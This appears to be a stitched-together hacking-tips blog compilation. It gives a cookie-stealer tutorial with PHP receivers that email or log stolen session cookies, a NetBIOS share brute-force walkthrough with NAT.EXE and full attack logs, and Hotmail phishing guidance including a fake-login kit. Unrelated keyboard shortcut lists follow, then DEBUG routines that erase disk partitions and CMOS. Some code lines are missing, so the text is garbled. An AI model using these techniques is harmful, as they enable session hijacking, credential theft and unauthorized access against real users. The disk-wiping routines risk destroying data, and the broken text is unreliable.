How to Make a Cookie Stealer
by Taksaalisingh


Introduction

Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.

The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.

The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.


Step One: The Code

Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).

As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.

Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.


First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail("me@mydomain.com", "Cookie stealer report", $cookie); // line 3
?> // line 4


Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.


Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5


Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.


Step Two: Implementing the Stealer

The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.

// Line 3


Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).


There are two main ways of implementing the sender:

You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.

This summary is not available. Please click here to view the post.

NetBIOS Hacking
This is for an Educational purpose only

All viewers please keep in mind one thing that all this information her is given for informational purpose so please dnt misuse of your knowledge
NetBIOS Attack MethodsThis NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1. One of the components being used is NAT.EXEA discussion of the tool, it switches, and common techniques follows:
NAT.EXE [-o filename] [-u userlist] [-p passlist]

Switches:

-o Specify the output file. All results from the scan
will be written to the specified file, in addition
to standard output.
-u Specify the file to read usernames from. Usernames
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Usernames should appear one per line in the specified file.
-p Specify the file to read passwords from. Passwords
will be read from the specified file when attempting to guess the password on the remote server.
Passwords should appear one per line in the specified file.

Addresses should be specified in comma deliminated
format, with no spaces. Valid address specifications include:
hostname - "hostname" is added
127.0.0.1-127.0.0.3, adds addresses 127.0.0.1
through 127.0.0.3
127.0.0.1-3, adds addresses 127.0.0.1 through
127.0.0.3
127.0.0.1-3,7,10-20, adds addresses 127.0.0.1
through 127.0.0.3, 127.0.0.7, 127.0.0.10 through
127.0.0.20.
hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1
through 127.0.0.1
All combinations of hostnames and address ranges as
specified above are valid.

[8.0.1] Comparing NAT.EXE to Microsoft's own executables
[8.0.2] First, a look at NBTSTAT

First we look at the NBTSTAT command. This command was discussed in earlier portions of the book ( [5.0.6] The Nbtstat Command ). In this section, you will see a demonstration of how this tool is used and how it compares to other Microsoft tools and non Microsoft tools.

What follows is pretty much a step by step guide to using NBTSTAT as well as extra information. Again, if youre interested in more NBSTAT switches and functions, view the [5.0.6] The Nbtstat Command portion of the book.

C:\nbtstat -A XXX.XX.XXX.XX
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-C0-4F-C4-8C-9D

Here is a partial NetBIOS 16th bit listing:

Computername <00> UNIQUE workstation service name
<00> GROUP domain name
Server <20> UNIQUE Server Service name

Computername <03> UNIQUE Registered by the messenger service. This is the computername
to be added to the LMHOSTS file which is not necessary to use
NAT.EXE but is necessary if you would like to view the remote
computer in Network Neighborhood.
Username <03> Registered by the messenger service.
Domainname <1B> Registers the local computer as the master browser for the domain
Domainname <1C> Registers the computer as a domain controller for the domain
(PDC or BDC)
Domainname <1D> Registers the local client as the local segments master browser
for the domain
Domainname <1E> Registers as a Group NetBIOS Name
Network Monitor Name
Network Monitor Agent
<06> RAS Server
<1F> Net DDE
<21> RAS Client


[8.0.3] Intro to the NET commands
The NET command is a command that admins can execute through a dos window to show information about servers, networks, shares, and connections. It also has a number of command options that you can use to add user accounts and groups, change domain settings, and configure shares. In this section, you will learn about these NET commands, and you will also have the outline to a NET command Batch file that can be used as a primitive network security analysis tool. Before we continue on with the techniques, a discussion of the available options will come first:

[8.0.4] Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirements.
[8.0.5] Net Computer: This adds or deletes computers from a domains database.
[8.0.6] Net Config Server or Net Config Workstation: Displays config info about the server service. When used without specifying Server or Workstation, the command displays a list of configurable services.
[8.0.7] Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command.
[8.0.8] Net File: This command lists the open files on a server and has options for closing shared files and removing file locks.
[8.0.9] Net Group: This displays information about group names and has options you can use to add or modify global groups on servers.
[8.1.0] Net Help: Help with these commands
[8.1.1] Net Helpmsg message#: Get help with a particular net error or function message.
[8.1.2] Net Localgroup: Use this to list local groups on servers. You can also modify those groups.
[8.1.3] Net Name: This command shows the names of computers and users to which messages are sent on the computer.
[8.1.4] Net Pause: Use this command to suspend a certain NT service.
[8.1.5] Net Print: Displays print jobs and shared queues.
[8.1.6] Net Send: Use this command to send messages to other users, computers, or messaging names on the network.
[8.1.7] Net Session: Shows information about current sessions. Also has commands for disconnecting certain sessions.
[8.1.8] Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares.
[8.1.9] Net Statistics Server or Workstation: Shows the statistics log.
[8.2.0] Net Stop: Stops NT services, cancelling any connections the service is using. Let it be known that stopping one service, may stop other services.
[8.2.1] Net Time: This command is used to display or set the time for a computer or domain.
[8.2.2] Net Use: This displays a list of connected computers and has options for connecting to and disconnecting from shared resources.
[8.2.3] Net User: This command will display a list of user accounts for the computer, and has options for creating a modifying those accounts.
[8.2.4] Net View: This command displays a list of resources being shared on a computer. Including netware servers.
[8.2.5] Special note on DOS and older Windows Machines: The commands listed above are available to Windows NT Servers and Workstation, DOS and older Windows clients have these NET commands available:

Net Config
Net Diag (runs the diagnostic program)
Net Help
Net Init (loads protocol and network adapter drivers.)
Net Logoff
Net Logon
Net Password (changes password)
Net Print
Net Start
Net Stop
Net Time
Net Use
Net Ver (displays the type and version of the network redirector)
Net View

For this section, the command being used is the NET VIEW and NET USE commands.

[8.2.6] Actual NET VIEW and NET USE Screen Captures during a hack.
C:\net view XXX.XX.XXX.XX
Shared resources at XXX.XX.XXX.XX
Share name Type Used as Comment
------------------------------------------------------------------------------
NETLOGON Disk Logon server share
Test Disk
The command completed successfully.

NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown.

C:\net use /?
The syntax of this command is:

NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]

NET USE [devicename | *] [password | *]] [/HOME]

NET USE [/PERSISTENT:{YES | NO}]

C:\net use x: \\XXX.XX.XXX.XX\test

The command completed successfully.
C:\unzipped\nat10bin>net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK X: \\XXX.XX.XXX.XX\test Microsoft Windows Network
OK \\XXX.XX.XXX.XX\test Microsoft Windows Network


The command completed successfully.
Here is an actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, us.
C:\nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY

[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt

[*]--- Checking host: XXX.XX.XXX.XX
[*]--- Obtaining list of remote NetBIOS names

[*]--- Attempting to connect with name: *
[*]--- Unable to connect

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:
Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
[*]--- Obtained listing of shares:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share
Test Disk:

[*]--- This machine has a browse list:
Server Comment
--------- -------
STUDENT1

[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$

[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$

[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON

[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test

[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access

If the default share of Everyone/Full Control is active, then you are done, the server is hacked. If not, keep playing. You will be surprised what you find out.

Source: taksaalisingh

Hacking Hotmail
Introduction

We all use Hotmail!!!well its one of my Favorites.
Here m going to reveal n Alert About how the Unethical Hackers Can cheat us.

This Page is meant for Educational Purpose only. I do not Endorse Hacking at all but its Meant for knowing the Threats n Protect yourself also Curbing them
Topics

1:- How hotmail can be hacked with fake login screen (2 different ways)
2:- Fake e-mails threats
3:- Detect a fake message into hotmail
4:- How to get persons ip address through msn messenger
5:- curbing the way hackers get the passwords
6:- Easiest Way
7:- Change msn messenger title
8:- Protect yourself from Virus
9:- Hoax Toolbox v1.1
1) Protect yourself from Phishing
Usually The Unethical Hackers Upload their hotmail's fake login screen on a web server and then send these codes
to the victim from yahoo or another mail sending program. The codes are

< script>
location.href="http://www.yoursite.com/yourhotmailfakepage.html\/"
< /script>

and the user will be automatically redirected to your fake hotmail screen from their e-mail box & you r Hacked.
Beware of There Threats

2) Beware of Fake Login Screens

They Start chatting with your victim and send him the fake login screen through Their messenger and try to pish you.
there are many many of them available on the net.. which are usually small Visual Basic programs.. never reveal your password anywhere other than the latest Versions of msn Messengers.
3) Fake e-mails threats
This is very easy go to http://www.boxfrog.com/ register( its blocked now) but there are many others .. google u ll find many click on create message and in from filed type in any ones e-mail address and the message will be sent.
there's also a simple way of doing this by Telnet ting from the dos Prompt.
Beware of this Threat .. make your spam protection Powerful
4) Detect a fake message into Hotmail inbox
This is Simple Buddies.. open your e-mail box go to options select display setting or message display setting or (some thing like this) now select full where it says message display settings or something like this. Open the mail which u thought to be fake now in the last where it says from u can see the address of that site from where the mail is sent but if some one has sent it through some sort of program it will tell u his ip. n once you know D ip m sure u know how to go between it there after
IMP: Read the ip address log from Backwards.
5) Protect urself revealing your ip address through msn messenger
When you Open your messenger start chatting with friend open ms dos and type netstat -n there do not press enter and then minimize it after this send something to your victim and as soon as he accept it the hotmail messenger will say connecting this is the time when u re maximize your MS-DOS and
press enter the ip address next to time wait: will the friends ip. U may be Hacked The same way

Beware!!
HoaX Toolbox v1.1
This is a PHP script that creates a website with an admin area that allows the user to choose between fake login pages of MSN Messenger, Hotmail, Yahoo and Google Mail, once you set up the script on a server that has PHP and SQL you will be able to log in the administration page and choose the fake login page to display to the main site, when the victim tries to log-in their mail/messenger, the website keeps the user/pass information in a log file that you can view anytime from the admin area, if the victim is not stupid enough to add their real log-in because they read the URL of your server instead of reading hotmail.com or yahoo.com in the URL bar then remember you can pop-up the main page of the site and disable the URL bar on the explorer, so when the user clicks on your real site the link "Yahoo Mail" an explorer without URL bar pops up, if you don't know how to pop up customized browsers search google


Hacking MSN
Small yet working trick
Hacking MSN is actually VERY simple. Msn is designed to route the connection through a Microsoft server while you are chatting. However, when a file is sent, a DCC (direct connection) is created. This was purposely done because otherwise Microsoft would waste a lot of bandwidth so a direct connection is made. This is your chance. Make a file transfer occur between u and a victim (try to send a big file), open up your command prompt (run "cmd" in NT/XP or "command" in 9X to get into prompt) and run netstat. usually the MSN targets IP would be above port 2000. enjoy.
If u receive some crap like gux1-43.primus.com as the target, do a reverse DNS lookup on it. However, this occurs very rarely, mostly u will receive a clear IP.

Once u have d IP u can do anything with him by Fingerprinting.

U can protect yourself from this occurring to you by using a proxy with MSN (under connections panel in options).

Source: taksaalisingh

List of F1-F9 Key Commands for the Command Prompt
F1 / right arrow: Repeats the letters of the last command line, one by one.
F2: Displays a dialog asking user to "enter the char to copy up to" of the last command line
F3: Repeats the last command line
F4: Displays a dialog asking user to "enter the char to delete up to" of the last command line
F5: Goes back one command line
F6: Enters the traditional CTRL+Z (^z)
F7: Displays a menu with the command line history
F8: Cycles back through previous command lines (beginning with most recent)
F9: Displays a dialog asking user to enter a command number, where 0 is for first command line entered.
Alt+Enter: toggle full Screen mode.
up/down: scroll thru/repeat previous entries
Esc: delete line
Note: The buffer allows a maximum of 50 command lines. After this number is reached, the first line will be replaced in sequence.
Helpful accessibility keyboard shortcuts
Switch FilterKeys on and off. Right SHIFT for eight seconds
Switch High Contrast on and off. Left ALT +left SHIFT +PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds

Gmail
Note: Must have "keyboard shortcuts" on in settings.
C: Compose new message.
Shift + C: Open new window to compose new message.
Slash (/): Switch focus to search box.
K: Switch focus to the next most recent email. Enter or "O" opens focused email.
J: Switch focus to the next oldest email.
N: Switch focus to the next message in the "conversation." Enter or "O" expands/collapses messages.
P: Switch focus to the previous message.
U: Takes you back to the inbox and checks for new mail.
Y: Various actions depending on current view:
Has no effect in "Sent" and "All Mail" views.
Inbox: Archive email or message.
Starred: Unstar email or message.
Spam: Unmark as spam and move back to "Inbox."
Trash: Move back to "Inbox."
Any label: Remove the label.
X: "Check" an email. Various actions can be performed against all checked emails.
S: "Star" an email. Identical to the more familiar term, "flagging."
R: Reply to the email.
A: Reply to all recipients of the email.
F: Forward an email.
Shift + R: Reply to the email in a new window.
Shift + A: Reply to all recipients of the email in a new window.
Shift + F: Forward an email in a new window.
Shift + 1 (!): Mark an email as spam and remove it from the inbox.
G then I: Switch to "Inbox" view.
G then S: Switch to "Starred" view.
G then A: Switch to "All Mail" view.
G then C: Switch to "Contacts" view.
G then S: Switch to "Drafts" view.

Mozilla Firefox Shortcuts
Ctrl + Tab or Ctrl + PageDown: Cycle through tabs.
Ctrl + Shift + Tab or Ctrl + PageUp: Cycle through tabs in reverse.
Ctrl + (1-9): Switch to tab corresponding to number.
Ctrl + N: New window.
Ctrl + T: New tab.
Ctrl + L or Alt + D or F6: Switch focus to location bar.
Ctrl + Enter: Open location in new tab.
Shift + Enter: Open location in new window.
Ctrl + K or Ctrl + E: Switch focus to search bar.
Ctrl + O: Open a local file.
Ctrl + W: Close tab, or window if there's only one tab open.
Ctrl + Shift + W: Close window.
Ctrl + S: Save page as a local file.
Ctrl + P: Print page.
Ctrl + F or F3: Open find toolbar.
Ctrl + G or F3: Find next...
Ctrl + Shift + G or Shift + F3: Find previous...
Ctrl + B or Ctrl + I: Open Bookmarks sidebar.
Ctrl + H: Open History sidebar.
Escape: Stop loading page.
Ctrl + R or F5: Reload current page.
Ctrl + Shift + R or Ctrl + F5: Reload current page; bypass cache.
Ctrl + U: View page source.
Ctrl + D: Bookmark current page.
Ctrl + NumpadPlus or Ctrl + Equals (+/=): Increase text size.
Ctrl + NumpadMinus or Ctrl + Minus: Decrease text size.
Ctrl + Numpad0 or Ctrl + 0: Set text size to default.
Alt + Left or Backspace: Back.
Alt + Right or Shift + Backspace: Forward.
Alt + Home: Open home page.
Ctrl + M: Open new message in integrated mail client.
Ctrl + J: Open Downloads dialog.
F6: Switch to next frame. You must have selected something on the page already, e.g. by use of Tab.
Shift + F6: Switch to previous frame.
Apostrophe ('): Find link as you type.
Slash (/): Find text as you type.

Remote Desktop Connection Navigation
Ctrl + Alt + End: Open the NT Security dialog.
Alt + PageUp: Switch between programs.
Alt + PageDown: Switch between programs in reverse.
Alt + Insert: Cycle through the programs in most recently used order.
Alt + Home: Display start menu.
Ctrl + Alt + Break: Switch the client computer between a window and a full screen.
Alt + Delete: Display the Windows menu.
Ctrl + Alt + NumpadMinus: Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing Alt + PrintScreen on a local computer.
Ctrl + Alt + NumpadPlus: Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PrintScreen on a local computer.

Accessibility
Right Shift for eight seconds: Toggle FilterKeys on and off. FilterKeys must be enabled.
Left Alt + Left Shift + PrintScreen: Toggle High Contrast on and off. High Contrast must be enabled.
Left Alt + Left Shift + NumLock: Toggle MouseKeys on and off. MouseKeys must be enabled.
NumLock for five seconds: Toggle ToggleKeys on and off. ToggleKeys must be enabled.
Shift five times: Toggle StickyKeys on and off. StickyKeys must be enabled.
6.) Microsoft Natural Keyboard with IntelliType Software Installed
Win + L: Log off Windows.
Win + P: Open Print Manager.
Win + C: Open control panel.
Win + V: Open clipboard.
Win + K: Open keyboard properties.
Win + I: Open mouse properties.
Win + A: Open Accessibility properties.
Win + Space: Displays the list of Microsoft IntelliType shortcut keys.
Win + S: Toggle CapsLock on and off.

Generic
Ctrl + C or Ctrl + Insert: Copy.
Ctrl + X or Shift + Delete: Cut.
Ctrl + V or Shift + Insert: Paste/Move.
Ctrl + N: New... File, Tab, Entry, etc.
Ctrl + S: Save.
Ctrl + O: Open...
Ctrl + P: Print.
Ctrl + Z: Undo.
Ctrl + A: Select all.
Ctrl + F: Find...
Ctrl+W : to close the current window
Ctrl + F4: Close tab or child window.
F1: Open help.
F11: Toggle full screen mode.
Alt or F10: Activate menu bar.
Alt + Space: Display system menu. Same as clicking the icon on the titlebar.
Escape: Remove focus from current control/menu, or close dialog box.
Generic Navigation
Tab: Forward one item.
Shift + Tab: Backward one item.
Ctrl + Tab: Cycle through tabs/child windows.
Ctrl + Shift + Tab: Cycle backwards through tabs/child windows.
Enter: If a button's selected, click it, otherwise, click default button.
Space: Toggle items such as radio buttons or checkboxes.
Alt + (Letter): Activate item corresponding to (Letter). (Letter) is the underlined letter on the item's name.
Ctrl + Left: Move cursor to the beginning of previous word.
Ctrl + Right: Move cursor to the beginning of next word.
Ctrl + Up: Move cursor to beginning of previous paragraph. This and all subsequent Up/Down hotkeys in this section have only been known to work in Rich Edit controls.
Ctrl + Down: Move cursor to beginning of next paragraph.
Shift + Left: Highlight one character to the left.
Shift + Right: Highlight one character to the right.
Shift + Up: Highlight from current cursor position, to one line up.
Shift + Down: Highlight from current cursor position, to one line down.
Ctrl + Shift + Left: Highlight to beginning of previous word.
Ctrl + Shift + Right: Highlight to beginning of next word.
Ctrl + Shift + Up: Highlight to beginning of previous paragraph.
Ctrl + Shift + Down: Highlight to beginning of next paragraph.
Home: Move cursor to top of a scrollable control.
End: Move cursor to bottom of a scrollable control.
Generic File Browser
Arrow Keys: Navigate.
Shift + Arrow Keys: Select multiple items.
Ctrl + Arrow Keys: Change focus without changing selection. "Focus" is the object that will run on Enter. Space toggles selection of the focused item.
(Letter): Select first found item that begins with (Letter).
BackSpace: Go up one level to the parent directory.
Alt + Left: Go back one folder.
Alt + Right: Go forward one folder.
Enter: Activate (Double-click) selected item(s).
Alt + Enter: View properties for selected item.
F2: Rename selected item(s).
Ctrl + NumpadPlus: In a Details view, resizes all columns to fit the longest item in each one.
Delete: Delete selected item(s).
Shift + Delete: Delete selected item(s); bypass Recycle Bin.
Ctrl while dragging item(s): Copy.
Ctrl + Shift while dragging item(s): Create shortcut(s).

In tree pane, if any:
Left: Collapse the current selection if expanded, or select the parent folder.
Right: Expand the current selection if collapsed, or select the first subfolder.
Numpad Asterisk: Expand currently selected directory and all subdirectories. No undo.
Numpad Plus: Expand currently selected directory.
Numpad Minus: Collapse currently selected directory.

Windows Hotkeys
Shift + F10 right-clicks.
Win + L (XP Only): Locks keyboard. Similar to Lock Workstation.
Win + F or F3: Open Find dialog. (All Files) F3 may not work in some applications which use F3 for their own find dialogs.
Win + Control + F: Open Find dialog. (Computers)
Win + U: Open Utility Manager.
Win + F1: Open Windows help.
Win + Pause: Open System Properties dialog.
Win + Tab: Cycle through taskbar buttons. Enter clicks, AppsKey or Shift + F10 right-clicks.
Win + Shift + Tab: Cycle through taskbar buttons in reverse.
Alt + Tab: Display Cool Switch. More commonly known as the AltTab dialog.
Alt + Shift + Tab: Display Cool Switch; go in reverse.
Alt + Escape: Send active window to the bottom of the z-order.
Alt + Shift + Escape: Activate the window at the bottom of the z-order.
Alt + F4: Close active window; or, if all windows are closed, open shutdown dialog.
Shift while a CD is loading: Bypass AutoPlay.
Shift while login: Bypass startup folder. Only those applications will be ignored which are in the startup folder, not those started from the registry (Microsoft\Windows\CurrentVersion\Run\)
Ctrl + Alt + Delete or Ctrl + Alt + NumpadDel (Both NumLock states): Invoke the Task Manager or NT Security dialog.
Ctrl + Shift + Escape (2000/XP ) or (Ctrl + Alt + NumpadDot) : Invoke the task manager. On earlier OSes, acts like Ctrl + Escape.
Print screen: Copy screenshot of current screen to clipboard.
Alt + Print screen: Copy screenshot of current active window to clipboard.
Ctrl + Alt + Down Arrow: Invert screen. Untested on OS's other than XP.
Ctrl + Alt + Up Arrow: Undo inversion.
Win + B : Move focus to systray icons.

Check BIOS Date
The below debug routine is to check the date of your BIOS. All BIOS dates on PC compatible computers is stored at memory address FFFF5h. To display the date of your BIOS do the following: At the C:\> type debug - d FFFF:5 L 8 After typing the above command you should receive a string similar to: FFFF:0000 30 34 2F-33 30 2F 39 38 4/30/98 The 4/30/98 would be the date of your computer BIOS.
Video Card Type
The below debug routine will list the type of video card within your computer. This is an excellent way of determining the chipset on the card or the card within your computer without opening the computer. At the C:\> type debug -d c000:0040 After typing the above command you should receive several lines of text similar to:
C000:0040 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................
C000:0050 E9 63 7B 00 B4 10 49 27 - E9 FE 2B E9 F7 2B 50 4D .c{...I'..+..+PM
C000:0060 49 44 58 00 5B 00 00 00 - 00 A0 00 B0 00 B8 00 C0 IDX.[...........
C000:0070 00 5B 53 54 42 20 6E 56 - 49 44 49 41 20 54 4E 54 .[STB nVIDIA TNT
C000:0080 20 76 65 72 2E 20 31 2E - 31 30 20 0D 0A 00 1B 43 ver. 1.10 ....C
C000:0090 6F 70 79 72 69 67 68 74 - 28 43 29 31 39 39 38 20 copyright(C)1998
C000:00A0 53 54 42 20 53 79 73 74 - 65 6D 73 20 49 6E 63 0D STB Systems Inc.
C000:00B0 0A 00 22 6C 2C 0A 01 00 - C3 50 24 7F E8 60 36 58 .."1,....P$..'6X

As you can pick out in the above dump, this gives you enough information to determine the make and the year made on the video card. On line 4 you can see the make of this video card, which in this case is a N VIDIA TNT which would be the Riva TNT chipset. The next line you notice the version of the card and finally the line thereafter is the copyright or the year manufactured, generally. If you are unable to capture any information which sounds like the video card, you can also type -d c000:0090

Reboot Your Computer
Implement this debug routine to reboot your computer. DEBUG E 40:72 34 12
RCS
FFFF
RIP
0000
G To create a batch file that reboots your computer without having to type the above command each time, use the below example. GOTO BEGIN
E 40:72 34 12
RCS
FFFF
RIP
0000
G

:BEGIN
DEBUG < REBOOT.BAT
Create a Sleep File
This file allows your computer to sleep for a specified amount of time. This file is not dangerous in any way; if typed improperly, more than likely the file will just not work. Type Debug You should get a "-" begin typing the below information; after each line you may get a response, do not press enter and type the next line after the response. N SLEEP.COM
A 100
MOV SI,0082
MOV AX,[SI]
XCHG AH,AL
XOR AX,3030
MOV BL,AL
MOV AL,0A
MUL AH
ADD AX,BX
MOV SI,AX
MOV AH,2C
INT 21
MOV BL,DH
MOV AX,SI
AAM
OR AX,3030
XCHG AH,AL
MOV [0160],AX
MOV AH,09
MOV DX,0160
INT 21
MOV AH,06
MOV DL,FF
INT 21
JZ 014C
OR AL,AL
JNZ 013F
MOV AH,08
INT 21
MOV AL,FF
MOV DX,016C
PUSH AX
MOV AH,09
INT 21
POP AX
MOV AH,4C
INT 21
MOV AH,2C
INT 21
CMP BL,DH
JZ 012D
MOV BL,DH
DEC SI
JNZ 011A
SUB AL,AL
MOV DX,016C
JMP 0142
DB "XX SECONDS", D, 24
DB " ", D, A, 24 RCX
79
W
Q Tip: You may cut and paste the above test into a notepad document and save the file with a .scr extension. Once saved from DOS, type debug < name of scrSLEEP.COM. which should create the file; should be created

Discharge Old Laptop Batteries
The below debug routine is used for older laptop batteries (i.e. batteries made from 1990-1992), we do not recommend using this routine on any newer laptop batteries or any NiMH batteries N DPDISCHG.COM
A
MOV DX,01E8
MOV AL,F9
OUT DX,AL
INT 20

RCX
10
W
Q This will write dpdischg.com to the current directory. To run this utility type dpdischg.

Erase HDD & Clear CMOS
Before doing the below routine ensure that you read our disclaimer as well as are sure that this is safe to do on your hard drive. Some computer hard drive manufacturers may void your warranty or this may cause damage to the hard drive when doing the below example. This routine is useful in clearing DDO and removing possible viruses. If this routine completes successfully it will erase everything from your Hard Drive as well as your reset your CMOS values. In the below debug routine, only type what is in bold from line 3 to 17, you will get a response if typed in properly. If you get a response continue to type the bold text as shown below in the below example.
A:\>debug
-fcs:200 400 0
-acs:100
-xxxx:0100 mov ax, 0
-xxxx:0103 mov ax, cx
-xxxx:0105 out 70, al
-xxxx:0107 mov ax, 0
-xxxx:010a out 71,al
-xxxx:010c inc cx
-xxxx:010d cmp cx,100
-xxxx:0111 jb 103
-xxxx:0113 mov ax,302
-xxxx:0116 mov bx,200
-xxxx:0119 mov cx,1
-xxxx:011c mov dx,80

-xxxx:011f int 13
-xxxx:012l int 20
-xxxx:0123 (without typing anythhing.)
-g program terminated normally If you are doing this debug routine to clear out a possible virus turn off your computer and wait and turn back on.
-q
Once back at DOS, reboot your computer When your computer comes back on from doing the above you will get an error message as booting up the computer, such as "Invalid Configuration". You must enter CMOS and set the time and date, save, and reboot again. Once rebooted, you will then need to run fdisk and recreate the partitions. Once created, you will then need to format the hard drive and proceed as normal.

Erase All HDD Information
This debug routine is used to erase all partition information on the hard disk drive and is only recommend for experienced users or users who are unable to delete the partition information through fdisk. In the below debug routine, only type what is in bold from line 3 to 8, you will get a response if typed in properly. If you get a response continue to type the bold text as shown below in the below example. A:\>debug
-F 200 L1000 0
-A CS:100
xxxx:0100 MOV AX,301
xxxx:0103 MOV BX,200
xxxx:0106 MOV CX,1
xxxx:0109 MOV DX,80 (80 for hd 0 or 81 for hd 1 ) xxxx:010C INT 13
xxxx:010E INT 20
xxxx:0110
-g
Program terminated normally

-q Once this debug routine is complete, reboot computer and all partitions should be erased. Before anything can be installed back onto the computer you must run Fdisk and recreate the partition as well as format the hard disk drive.

Erasing Sector 2
Before doing the below routine ensure that you have read our disclaimer and that you're sure that this is safe to do on your hard drive. Some computer hard drive manufacturers may void your warranty if this routine is ran or in some situations this can cause damage to the hard drive. This routine is useful in clearing DDO and unknown partitions. If this routine completes successfully it will erase everything in Sector 2. In the below debug routine, only type what is in bold from line 3 to 9, you will get a response if typed in properly. If you get a response continue to type the bold text as shown below in the below example.
A:\>debug
-FCS:200 400 0
-ACS:100
-xxxx:0100 mov ax,302
-xxxx:0103 mov bx,200
-xxxx:0106 mov cx,2
-xxxx:0109 mov dx, 80
-xxxx:010a int 13
